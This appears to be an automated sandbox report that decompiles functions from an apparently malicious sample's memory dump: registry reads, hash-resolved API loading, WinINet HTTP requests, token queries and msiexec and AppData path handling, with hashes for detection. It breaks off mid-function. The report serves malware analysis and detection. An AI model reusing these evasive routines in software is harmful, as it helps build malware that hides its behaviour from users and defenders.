0x000e1b97
0x000e1b9c
0x000e1b9f
0x000e1ba1
0x000e1bed
0x000e1bf0
0x000e1bf2
0x000e1c03
0x00000000
0x000e1c0b
0x000e1bf7
0x000e1bf9
0x00000000
0x000e1bfc
0x000e1bba
0x000e1bbf
0x000e1bc5
0x00000000
0x00000000
0x000e1bc7
0x000e1bc9
0x000e1bcb
0x000e1bcd
0x00000000
0x00000000
0x000e1bd3
0x000e1bd8
0x000e1bdb
0x000e1be3
0x00000000
0x000e1be3
0x000e1b20
0x000e1b30
0x000e1b35
0x000e1b3b
0x000e1b3d
0x000e1b42
0x00000000
0x00000000
0x00000000

APIs

InternetReadFile.WININET(?,?,00040000,00040000), ref: 000E1B86

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction ID: f5d09b28eb4001b7456b7d619e37f8121e289ecc29a67d6a58e42bea83ee775f
Opcode Fuzzy Hash: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction Fuzzy Hash: B831F6B2D0024E6FDB10DE96EC42FFF77A5AF90304F150025E908B7242FB71A9158BA2

Uniqueness

Uniqueness Score: -1.00%

Function 000EBA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E000EBA60(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v20;
				signed char _t22;
				long _t24;
				void* _t26;
				long _t29;
				signed char _t30;
				char* _t34;
				long _t36;
				char** _t47;
				int _t49;
				char* _t51;
				void* _t52;
				void* _t54;
				void* _t58;
				void* _t60;

				_push(__eax);
				 *_a20 = 0;
				_t22 = E000F5000(_a20, _t60, 0xffffffff);
				E000EBF50(_t60, 9, 0xda29a27);
				_t54 = _t52 + 0xc;
				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t49 = 0xffffffff;
				_t61 = _t24;
				if(_t24 == 0) {
					_t47 = _a20;
					_v20 = 0;
					_t26 = E000E9D50(0x647400a5);
					E000EBF50(_t61, _t26, E000E9D50(0x64f4976b));
					_t58 = _t54 + 0x10;
					_t29 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
					_t62 = _t29;
					if(_t29 == 0) {
						_t39 = _v20;
						_t30 = E000E55C0(_v20, 0);
						_t58 = _t58 + 8;
						_t49 = 0;
						__eflags = _t30 & 0x00000001;
						if(__eflags == 0) {
							E000E1460(__eflags, _t39, 4);
							_t34 = E000E8290(_t39 + 4);
							_t58 = _t58 + 0xc;
							__eflags = _t34;
							if(__eflags == 0) {
								goto L2;
							} else {
								_t51 = _t34;
								E000EBF50(__eflags, 9, 0x8097c7);
								_t58 = _t58 + 8;
								_t36 = RegQueryValueExW(_a4, _a12, 0, _a16, _t51,  &_v20); // executed
								__eflags = _t36;
								if(__eflags == 0) {
									 *_t47 = _t51;
									_t49 = _v20;
								} else {
									E000EB570(_t51);
									_t58 = _t58 + 4;
									goto L2;
								}
							}
						}
					} else {
						L2:
						_t49 = 0xffffffff;
					}
					E000EBF50(_t62, 9, 0x3111c69);
					_t54 = _t58 + 8;
					RegCloseKey(_a4); // executed
				}
				return _t49;
			}

0x000eba66
0x000eba70
0x000eba78
0x000eba90
0x000eba95
0x000ebaa1
0x000ebaa3
0x000ebaa8
0x000ebaaa
0x000ebab0
0x000ebab3
0x000ebabf
0x000ebad8
0x000ebadd
0x000ebaf1
0x000ebaf3
0x000ebaf5
0x000ebafe
0x000ebb04
0x000ebb09
0x000ebb0c
0x000ebb0e
0x000ebb10
0x000ebb18
0x000ebb21
0x000ebb26
0x000ebb29
0x000ebb2b
0x00000000
0x000ebb2d
0x000ebb2d
0x000ebb36
0x000ebb3b
0x000ebb4e
0x000ebb50
0x000ebb52
0x000ebb5f
0x000ebb61
0x000ebb54
0x000ebb55
0x000ebb5a
0x00000000
0x000ebb5a
0x000ebb52
0x000ebb2b
0x000ebaf7
0x000ebaf7
0x000ebaf7
0x000ebaf7
0x000ebb6b
0x000ebb70
0x000ebb76
0x000ebb76
0x000ebb81

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 000EBAA1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 000EBAF1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 000EBB4E
RegCloseKey.KERNEL32(?), ref: 000EBB76

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction ID: ea05c86a3b06f6cdaeb1820e6ccd81dc2c2880bcbb2ea288fbca214ae0f687ba
Opcode Fuzzy Hash: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction Fuzzy Hash: E83195B29002997FEB109E669C42FEF3658AB15764F090120FE18762D3F771AD1186F2

Uniqueness

Uniqueness Score: -1.00%

Function 000FBAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000FBAD0(void* __eflags, void* _a4, char* _a8, char* _a12, void* _a16, long _a20, intOrPtr _a24) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				char* _v36;
				char _v48;
				char _v54;
				char _v65;
				char _v97;
				char _v204;
				intOrPtr _t38;
				void* _t43;
				char* _t47;
				char* _t51;
				void* _t52;
				char* _t57;
				int _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				signed char _t65;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t74;
				signed char _t82;
				signed int _t85;
				void* _t99;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t115;
				void* _t117;
				intOrPtr _t126;

				_t125 = __eflags;
				_t38 = E000E3750(_t125, E000E20A0(__eflags, _a24, 0xfffffffb), _a24);
				_t126 = _t38;
				_v28 = _t38;
				E000FED80( &_v48, _t126, E000ED0A0( &_v54, "HHb?",  &_v54));
				_v36 = E000FFCF0( &_v48);
				_v32 = 0;
				_t43 = E000E9D50(0x647400bf);
				E000EBF50(_t126, _t43, E000E9D50(0x6f9f943d));
				_t47 = E000ED0A0( &_v65, 0x1004e6,  &_v65);
				_t90 =  ==  ? 0x100779 : 0x1007f4;
				_t51 = E000ED0A0( &_v204,  ==  ? 0x100779 : 0x1007f4,  &_v204);
				_t115 = _t107 + 0x38;
				_t52 = HttpOpenRequestA(_a4, _t51, _a8, _t47, _a12,  &_v36, (0 | _t126 != 0x00000000) << 0x00000017 | 0x8404c700, 0); // executed
				_t104 = 0;
				if(_t52 == 0) {
					L9:
					E000FEC50( &_v48, _t134);
					return _t104;
				}
				_t105 = _a16;
				_t129 = _v28;
				_t99 = _t52;
				if(_v28 != 0) {
					_v20 = 0;
					_v24 = 4;
					_t68 = E000EBF50(_t129, 0x13, 0x85dc001);
					_t115 = _t115 + 8;
					_push( &_v24);
					_push( &_v20);
					_push(0x1f);
					_push(_t99);
					if( *_t68() != 0) {
						_t85 = _v20 ^ 0x00013380 | E000E9D50(0x6475332c) & _v20;
						_t131 = _t85;
						_v20 = _t85;
						_t72 = E000E9D50(0x647400bf);
						_t74 = E000EBF50(_t85, _t72, E000E9D50(0x61c0d6ad));
						_t115 = _t115 + 0x14;
						 *_t74(_t99, 0x1f,  &_v20, 4);
					}
				}
				E000EBF50(_t131, 0x13, 0xb157a91);
				_t57 = E000ED0A0( &_v97, 0x100880,  &_v97);
				_t117 = _t115 + 0x10;
				_t58 = HttpSendRequestA(_t99, _t57, 0x13, _t105, _a20); // executed
				_t132 = _t58;
				if(_t58 == 0) {
					L8:
					_t59 = E000EBF50(__eflags, 0x13, 0x714b685);
					 *_t59(_t99);
					_t104 = 0;
					__eflags = 0;
				} else {
					_v20 = 0;
					_v24 = 4;
					_t61 = E000EBF50(_t132, 0x13, 0x249c261);
					_t82 = E000E55C0( *_t61(_t99, 0x20000013,  &_v20,  &_v24, 0), 0) & 0x00000001;
					_t65 = E000E5920( &_v24, _v20, E000E9D50(0x64740064));
					_t117 = _t117 + 0x1c;
					if((_t82 & _t65) != 0) {
						goto L8;
					}
					_t134 = _t65 & 0x00000001 ^ _t82;
					if((_t65 & 0x00000001 ^ _t82) != 0) {
						goto L8;
					}
					_t104 = _t99;
				}
			}

0x000fbad0
0x000fbaec
0x000fbaf6
0x000fbaf8
0x000fbb1e
0x000fbb2a
0x000fbb2d
0x000fbb39
0x000fbb52
0x000fbb65
0x000fbb7e
0x000fbb89
0x000fbb8e
0x000fbba3
0x000fbba5
0x000fbba9
0x000fbce1
0x000fbce4
0x000fbcf5
0x000fbcf5
0x000fbbaf
0x000fbbb2
0x000fbbb6
0x000fbbb8
0x000fbbba
0x000fbbc1
0x000fbbcf
0x000fbbd4
0x000fbbdd
0x000fbbde
0x000fbbdf
0x000fbbe1
0x000fbbe6
0x000fbc00
0x000fbc00
0x000fbc02
0x000fbc0a
0x000fbc23
0x000fbc28
0x000fbc34
0x000fbc34
0x000fbbe6
0x000fbc3d
0x000fbc50
0x000fbc55
0x000fbc60
0x000fbc62
0x000fbc64
0x000fbccd
0x000fbcd4
0x000fbcdd
0x000fbcdf
0x000fbcdf
0x000fbc66
0x000fbc66
0x000fbc6d
0x000fbc7b
0x000fbca5
0x000fbcb7
0x000fbcbc
0x000fbcc1
0x00000000
0x00000000
0x000fbcc5
0x000fbcc7
0x00000000
0x00000000
0x000fbcc9
0x000fbcc9

APIs

HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000FBBA3
HttpSendRequestA.WININET(00000000,00000000,00000013,?,00000000), ref: 000FBC60

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

Strings

HHb?, xrefs: 000FBB0B

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: HttpRequest$LibraryLoadOpenSend
String ID: HHb?
API String ID: 1801990682-3770701742
Opcode ID: 37335ebfa9e189fa0e8c50e602b1933ac3c1dab23defc1ea29f561387f62de34
Instruction ID: 7f6f79a3d5116e3b79b696b52c001d527390948e59ace8732f5a3f805c9815dd
Opcode Fuzzy Hash: 37335ebfa9e189fa0e8c50e602b1933ac3c1dab23defc1ea29f561387f62de34
Instruction Fuzzy Hash: 9C5196F2D4025A6FEB10AAA1EC52FFF36689B14704F050434FA18B6283FB615A1597F2

Uniqueness

Uniqueness Score: -1.00%

Function 000F1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E000F1E90(void* __eflags, intOrPtr _a4) {
				short _v440;
				char _v516;
				char _v536;
				char _v1056;
				intOrPtr* _t10;
				void* _t11;
				signed char _t12;
				intOrPtr* _t16;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				char* _t32;
				char* _t33;
				void* _t36;
				void* _t38;

				_t10 = E000EBF50(__eflags, 8, 0x3a5687);
				_t32 =  &_v1056;
				_t11 =  *_t10(0, 0x24, 0, 0, _t32); // executed
				_t12 = E000E55C0(_t11, 0);
				_t38 = _t36 + 0x10;
				_t48 = _t12 & 0x00000001;
				if((_t12 & 0x00000001) == 0) {
					L7:
					E000F8F20(_a4, E000E9D50(0x647400bc));
					__eflags = 0;
					return 0;
				}
				_t16 = E000EBF50(_t48, 3, 0x55e8477);
				 *_t16(_t32);
				_t18 = E000EBF50(_t48, 0, 0xfb8d9e7);
				_t38 = _t38 + 0x10;
				_t33 =  &_v536;
				0;
				while(1) {
					_t19 =  *_t18(_t32, _t33, 0x104); // executed
					_t49 = _t19;
					if(_t19 != 0) {
						break;
					}
					_t23 = E000EBF50(_t49, 3, 0xd0682f7);
					 *_t23(_t32);
					_t25 = E000EBF50(_t49, 3, 0x42c2f97);
					_t38 = _t38 + 0x10;
					_t26 =  *_t25(_t32);
					_t50 = _t26;
					if(_t26 == 0) {
						goto L7;
					}
					_t27 = E000E9D50(0x647400af);
					_t29 = E000EBF50(_t50, _t27, E000E9D50(0x612a84db));
					 *_t29(_t32);
					_t18 = E000EBF50(_t50, 0, E000E9D50(0x6bccd94b));
					_t38 = _t38 + 0x1c;
				}
				__eflags = _v516 - 0x7b;
				if(__eflags != 0) {
					goto L7;
				}
				_v440 = 0;
				_t20 = E000EBF50(__eflags, 0xc, 0xd513d37);
				_t38 = _t38 + 8;
				_t21 =  *_t20( &_v516, _a4);
				__eflags = _t21;
				if(_t21 == 0) {
					return 1;
				}
				goto L7;
			}

0x000f1ea3
0x000f1eab
0x000f1eba
0x000f1ebf
0x000f1ec4
0x000f1ec7
0x000f1ec9
0x000f1faa
0x000f1fbb
0x000f1fc3
0x00000000
0x000f1fc3
0x000f1ed6
0x000f1edf
0x000f1ee8
0x000f1eed
0x000f1ef0
0x000f1efc
0x000f1f00
0x000f1f07
0x000f1f09
0x000f1f0b
0x00000000
0x00000000
0x000f1f14
0x000f1f1d
0x000f1f26
0x000f1f2b
0x000f1f2f
0x000f1f31
0x000f1f33
0x00000000
0x00000000
0x000f1f3a
0x000f1f53
0x000f1f5c
0x000f1f6e
0x000f1f73
0x000f1f73
0x000f1f78
0x000f1f80
0x00000000
0x00000000
0x000f1f88
0x000f1f98
0x000f1f9d
0x000f1fa4
0x000f1fa6
0x000f1fa8
0x00000000
0x000f1fd0
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000F1EBA

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 000F1F07

Strings

{, xrefs: 000F1F78

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Volume$FolderLibraryLoadMountNamePathPoint
String ID: {
API String ID: 4030958988-366298937
Opcode ID: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction ID: 6e09238c17827b03ca21e92cde4f89469092f615b21d2d0ad95a4578814e55b3
Opcode Fuzzy Hash: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction Fuzzy Hash: 292171B5E8435A7AF72032B16C13FFA31585B6074AF050430FE0C74183FAA6AB5955B3

Uniqueness

Uniqueness Score: -1.00%

Function 000EBCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E000EBCD0(void* __eflags) {
				void* _t3;
				void* _t4;
				void* _t6;
				intOrPtr* _t8;
				void* _t9;
				intOrPtr* _t10;
				signed int _t11;

				_t3 = E000F9AC0(__eflags, 0xffffffff); // executed
				_t4 = E000E7DD0(0xa8);
				_t16 =  ==  ? 0x8026 : 0x801a;
				_t6 = E000E9D50(0x647400a4);
				_t8 = E000EBF50(_t3 - _t4, _t6, E000E9D50(0x644e562b));
				_t9 =  *_t8(0,  ==  ? 0x8026 : 0x801a, 0, 0, "C:\Users\Albus\AppData\Roaming"); // executed
				if(_t9 == 0) {
					_t10 = E000EBF50(__eflags, 0, 0xfda8b77);
					_t11 =  *_t10(0, "C:\Windows\SysWOW64\msiexec.exe", 0x104);
					__eflags = _t11;
					_t2 = _t11 != 0;
					__eflags = _t2;
					return _t11 & 0xffffff00 | _t2;
				}
				return 0;
			}

0x000ebcd8
0x000ebce7
0x000ebcfb
0x000ebd03
0x000ebd1c
0x000ebd30
0x000ebd34
0x000ebd41
0x000ebd55
0x000ebd57
0x000ebd59
0x000ebd59
0x00000000
0x000ebd59
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,C:\Users\user\AppData\Roaming), ref: 000EBD30

Strings

C:\Windows\SysWOW64\msiexec.exe, xrefs: 000EBD4E
C:\Users\user\AppData\Roaming, xrefs: 000EBD24

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: FolderPath
String ID: C:\Users\user\AppData\Roaming$C:\Windows\SysWOW64\msiexec.exe
API String ID: 1514166925-2433609249
Opcode ID: 08860ecd4c557fc77622b44306e47629bfe3e43551c4389ee065e06ec0f47622
Instruction ID: 71a01b1b3506f647fda1a80bdff53aec333957862e5b27a3adb5751834edbb5e
Opcode Fuzzy Hash: 08860ecd4c557fc77622b44306e47629bfe3e43551c4389ee065e06ec0f47622
Instruction Fuzzy Hash: 13F0C8E6F852953BF66021B63C07FBB21488B91769F190130FA0DB51C3F981D91442B3

Uniqueness

Uniqueness Score: -1.00%

Function 000F8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000F8590(void* __eflags, intOrPtr _a4) {
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				union _TOKEN_INFORMATION_CLASS _t22;
				int _t23;
				signed char _t24;
				signed char _t30;
				void* _t31;
				int _t33;
				intOrPtr* _t35;
				signed char* _t36;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;
				signed char* _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t61;
				void* _t63;

				_t63 = __eflags;
				_v20 = 0;
				_t16 = E000E9D50(0x647400a5);
				_t18 = E000EBF50(_t63, _t16, E000E9D50(0x6b5f7e12));
				_t54 = _t51 + 0x10;
				_t19 =  *_t18(_a4, 8,  &_v20);
				_t64 = _t19;
				if(_t19 == 0) {
					_t49 = 0xffffffff;
					L12:
					return _t49;
				}
				E000EBF50(_t64, 9, 0xbd557e);
				_t22 = E000E9D50(0x647400b5);
				_t42 =  &_v24;
				_t23 = GetTokenInformation(_v20, _t22, 0, 0, _t42); // executed
				_t24 = E000E55C0(_t23, 0);
				_t57 = _t54 + 0x14;
				_t49 = 0xffffffff;
				_t65 = _t24 & 0x00000001;
				if((_t24 & 0x00000001) == 0) {
					L10:
					E000EBF50(_t71, 0, 0xb8e7db5);
					CloseHandle(_v20); // executed
					goto L12;
				}
				_t30 = E000E55C0( *((intOrPtr*)(E000EBF50(_t65, 0, E000E9D50(0x68042b4e))))(), 0x7a);
				_t57 = _t57 + 0x14;
				if((_t30 & 0x00000001) == 0) {
					goto L10;
				}
				_t31 = E000E8290(_v24);
				_t57 = _t57 + 4;
				_t67 = _t31;
				if(_t31 != 0) {
					_t47 = _t31;
					E000EBF50(_t67, 9, 0xbd557e);
					_t61 = _t57 + 8;
					_t33 = GetTokenInformation(_v20, 0x19, _t47, _v24, _t42); // executed
					_t49 = 0xffffffff;
					_t68 = _t33;
					if(_t33 != 0) {
						_t35 = E000EBF50(_t68, 9, 0x8847844);
						_t61 = _t61 + 8;
						_t36 =  *_t35( *_t47);
						if(_t36 != 0) {
							_t70 =  *_t36;
							_t43 = _t36;
							if( *_t36 != 0) {
								_v28 = E000EBF50(_t70, 9, 0x7a1c189);
								_t40 = E000E22E0(_t70, ( *_t43 & 0x000000ff) + 0x57d8073d, 0x57d8073e);
								_t61 = _t61 + 0x10;
								_t41 = _v28( *_t47, _t40);
								_t71 = _t41;
								if(_t41 != 0) {
									_t49 =  *_t41;
								}
							}
						}
					}
					E000EB570(_t47);
					_t57 = _t61 + 4;
				}
			}

0x000f8590
0x000f859c
0x000f85a8
0x000f85c1
0x000f85c6
0x000f85d0
0x000f85d2
0x000f85d4
0x000f86f6
0x000f86fb
0x000f8704
0x000f8704
0x000f85e1
0x000f85f3
0x000f85fb
0x000f8605
0x000f860a
0x000f860f
0x000f8612
0x000f8617
0x000f8619
0x000f86e0
0x000f86e7
0x000f86f2
0x00000000
0x000f86f2
0x000f863c
0x000f8641
0x000f8646
0x00000000
0x00000000
0x000f864f
0x000f8654
0x000f8657
0x000f8659
0x000f865f
0x000f8668
0x000f866d
0x000f867a
0x000f867c
0x000f8681
0x000f8683
0x000f868c
0x000f8691
0x000f8696
0x000f869a
0x000f869c
0x000f869f
0x000f86a1
0x000f86b2
0x000f86c3
0x000f86c8
0x000f86ce
0x000f86d1
0x000f86d3
0x000f86d5
0x000f86d5
0x000f86d3
0x000f86a1
0x000f869a
0x000f86d8
0x000f86dd
0x000f86dd

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 000F8605
CloseHandle.KERNEL32(00000000), ref: 000F86F2

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

Part of subcall function 000E8290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000E82E8

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 000F867A

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: InformationToken$AllocateCloseHandleHeapLibraryLoad
String ID:
API String ID: 3980138298-0
Opcode ID: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction ID: 9344ca67dc950876b8c0e5b96643912f6a1331f1bcf88b503fa35464439e2c20
Opcode Fuzzy Hash: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction Fuzzy Hash: D531B2A6E402593FEB2126B16C03FBF75585F51759F090030FE18B62D3FA51AE1496B3

Uniqueness

Uniqueness Score: -1.00%

Function 000EA5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E000EA5E0(WCHAR* _a4, void** _a8, void* _a12) {
				void* _v12;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				void* _t21;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void** _t42;
				signed int _t43;
				void* _t46;
				void* _t49;
				void* _t51;
				void* _t52;

				_t42 = _a8;
				E000EBF50(_t52, 0, 0xad68947);
				_t46 = (_t43 & 0xfffffff8) - 0x10 + 8;
				_t40 =  ==  ? 1 : 7;
				_t21 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
				_t54 = _t21 - 0xffffffff;
				_t42[2] = _t21;
				if(_t21 == 0xffffffff) {
					L4:
					_t22 = 0;
				} else {
					_t24 = E000EBF50(_t54, 0, E000E9D50(0x651fdb24));
					_t49 = _t46 + 0xc;
					_push( &_v20);
					_push(_t42[2]);
					if( *_t24() == 0) {
						L3:
						_t26 = E000EBF50(_t56, 0, 0xb8e7db5);
						 *_t26(_t42[2]);
						goto L4;
					} else {
						_t56 = _v24;
						if(_v24 == 0) {
							_t28 = _v28;
							__eflags = _t28;
							_t42[1] = _t28;
							if(__eflags == 0) {
								 *_t42 = 0;
								_t22 = 1;
							} else {
								E000EBF50(__eflags, 0, 0x1f8cae3);
								_t49 = _t49 + 8;
								_t30 = VirtualAlloc(0, _t42[1], 0x3000, 4); // executed
								__eflags = _t30;
								 *_t42 = _t30;
								if(__eflags == 0) {
									goto L3;
								} else {
									E000EBF50(__eflags, 0, 0xb7ac9a5);
									_t51 = _t49 + 8;
									_t32 = ReadFile(_t42[2],  *_t42, _t42[1],  &_v32, 0); // executed
									__eflags = _t32;
									if(__eflags == 0) {
										L12:
										_t33 = E000EBF50(__eflags, 0, 0xb1fd105);
										_t49 = _t51 + 8;
										 *_t33( *_t42, 0, 0x8000);
										goto L3;
									} else {
										__eflags = _v32 - _t42[1];
										if(__eflags != 0) {
											goto L12;
										} else {
											_t22 = 1;
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				return _t22;
			}

0x000ea5eb
0x000ea5f8
0x000ea5fd
0x000ea60e
0x000ea620
0x000ea622
0x000ea625
0x000ea628
0x000ea66b
0x000ea66b
0x000ea62a
0x000ea63a
0x000ea63f
0x000ea646
0x000ea647
0x000ea64e
0x000ea657
0x000ea65e
0x000ea669
0x00000000
0x000ea650
0x000ea650
0x000ea655
0x000ea674
0x000ea678
0x000ea67a
0x000ea67d
0x000ea6d3
0x000ea6d9
0x000ea67f
0x000ea686
0x000ea68b
0x000ea69a
0x000ea69c
0x000ea69e
0x000ea6a0
0x00000000
0x000ea6a2
0x000ea6a9
0x000ea6ae
0x000ea6c0
0x000ea6c2
0x000ea6c4
0x000ea6dd
0x000ea6e4
0x000ea6e9
0x000ea6f5
0x00000000
0x000ea6c6
0x000ea6ca
0x000ea6cd
0x00000000
0x000ea6cf
0x000ea6cf
0x000ea6cf
0x000ea6cd
0x000ea6c4
0x000ea6a0
0x00000000
0x00000000
0x00000000
0x000ea655
0x000ea64e
0x000ea673

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 000EA620
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 000EA69A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 000EA6C0

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction ID: 9e8c2f4965cb8cfdce9dd90bff119f42722c8792f4d7849aeb8b54a5fc68ca3e
Opcode Fuzzy Hash: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction Fuzzy Hash: C3312571744341BFE7216B62DC03F5A72D09F46B01F184828FAADBA1D1E7B1F9009A62

Uniqueness

Uniqueness Score: -1.00%

Function 000EABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E000EABF0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				void* _t11;
				signed char _t12;
				long _t14;
				signed int _t29;
				void* _t38;

				_t12 = E000F5000(_t11, _t38, 0xffffffff);
				E000EBF50(_t38, 9, 0xda29a27);
				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t29 = 0xffffffff;
				_t39 = _t14;
				if(_t14 == 0) {
					E000EBF50(_t39, 9, 0x8097c7);
					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
					asm("sbb esi, esi");
					_t29 =  !0x00000000 | _a24;
					E000EBF50( !0x00000000, 9, 0x3111c69);
					RegCloseKey(_a4); // executed
				}
				return _t29;
			}

0x000eabfe
0x000eac16
0x000eac27
0x000eac29
0x000eac2e
0x000eac30
0x000eac42
0x000eac56
0x000eac5d
0x000eac61
0x000eac6b
0x000eac76
0x000eac76
0x000eac7e

APIs

RegOpenKeyExW.KERNEL32(00000000,?,00000000,?,?), ref: 000EAC27
RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 000EAC56

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

RegCloseKey.KERNEL32(?,?,?,?,?), ref: 000EAC76

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: CloseLibraryLoadOpenQueryValue
String ID:
API String ID: 3751545530-0
Opcode ID: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction ID: da431b45291480e9828c1b08c9a458dce6d212f1efe3f3142593f5b36fb060c2
Opcode Fuzzy Hash: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction Fuzzy Hash: B70196779402687FDB109E95DC42FDB3758DB49B65F050220FE28A72C2E661BD1187F1

Uniqueness

Uniqueness Score: -1.00%

Function 000F4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E000F4680(void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v52;
				char _v64;
				intOrPtr _v72;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				char _v208;
				char _v220;
				char _v232;
				char _v248;
				char _v266;
				char _v306;
				char _v528;
				char _v1048;
				void* _t171;
				void* _t173;
				void* _t175;
				intOrPtr* _t177;
				void* _t178;
				intOrPtr _t179;
				signed int _t229;
				signed int _t233;
				void* _t236;
				void* _t238;
				void* _t244;
				void* _t252;
				signed int _t254;
				void* _t263;
				void* _t269;
				void* _t276;
				intOrPtr _t279;
				signed int _t287;
				void* _t288;
				void* _t290;
				void* _t293;
				signed char _t299;
				void* _t314;
				signed int _t319;
				void* _t321;
				signed int _t323;
				signed int _t325;
				WCHAR* _t327;
				signed int _t329;
				void* _t339;
				signed int _t341;
				void* _t342;
				void* _t343;
				signed int _t350;
				signed int _t353;
